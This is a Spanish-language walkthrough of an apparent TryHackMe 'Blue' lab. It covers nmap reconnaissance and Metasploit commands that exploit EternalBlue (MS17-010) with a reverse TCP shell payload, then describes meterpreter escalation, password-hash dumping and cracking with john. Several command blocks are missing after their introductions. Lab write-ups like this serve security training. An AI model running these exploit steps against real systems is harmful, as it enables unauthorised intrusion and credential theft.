Blue

Introducción

Esta máquina es un Windows 7 vulnerable a EternalBlue. Iremos avanzando por la máquina, con las preguntas que nos plantean nos servirán de guía.

Task 1: Recon

Nos harán dos preguntas a las que podremos dar respuesta con los resultados de un escaneo con Nmap:

nmap -sV -sC -Pn <IP>

-sC: Ejecución de scripts predeterminados, estos nos permiten identificar vulnerabilidades a las que puede ser vulnerable el servicio u obtener información adicional.

-sV: Identifica la versión del servicio que se está ejecutando en el puerto, y por tanto, podemos saber si ese servicio es vulnerable a alguna vulnerabilidad conocida.

-Pn: Desactiva el realizar un ping para descubrir el host.

Task 2: Gain Access

En esta task se nos harán 3 preguntas, para responderlas, utilizaremos Metasploit para explotar la vulnerabilidad que me hemos descubierto en la tarea de recon:

sudo msfconsole -q

msf6 > search eternalblue

msf6 > use 0

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <IP>

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

Task 3: Escalate

Pondremos en background la shell obtenida como nos indican al principio de esta task

[Ctrl+Z]

Para responder las preguntas de este apartado, usaremos un módulo de post explotación disponible en Metasploit para convertir la shell obtenida en una shell de meterpreter:

Task 4: Cracking

Se nos indicará que comando usar para responder a una de las preguntas:

Este comando en meterpreter hará un dumpeo de los hashes de las contraseñas de cada usuario del sistema.

También existe un módulo para Metasploit para ello:

Para crackear estos hashes, podremos hacerlo con john directamente:

En Metasploit también tenemos un módulo para ello:

Task 5: Find Flags!

En este apartado debemos introducir las diferentes flags que se pueden encontrar en el sistema que ya hemos vulnerado, para ellos nos moveremos por los directorios del sistema:

Con estos comandos básicos para moverse en el sistema y conociendo la estructura de carpetas de Windows conseguirás las flags y habrás completado el laboratorio 👍

Última actualización